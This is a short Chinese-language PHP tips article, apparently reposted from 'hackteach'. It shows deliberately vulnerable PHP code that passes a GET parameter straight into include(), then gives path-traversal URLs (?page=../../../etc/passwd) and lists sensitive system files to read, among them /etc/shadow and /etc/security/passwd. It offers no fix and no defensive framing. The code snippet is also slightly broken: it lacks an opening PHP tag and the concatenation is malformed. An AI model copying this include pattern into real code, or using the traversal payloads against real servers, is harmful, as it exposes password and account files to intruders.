Home > Article > Backend Development > php 伪造本地文件包含漏洞的代码_php技巧
php 伪造本地文件包含漏洞的代码_php技巧
- WBOYOriginal
- 2016-05-17 09:14:421021browse
代码:
复制代码 代码如下:
$page=$_GET['page'];
include($page.'php');
?>
你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
来自hackteach
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Previous article:php数组函数序列之array_flip() 将数组键名与值对调_php技巧Next article:php数组函数序列之ksort()对数组的元素键名进行升序排序,保持索引关系_php技巧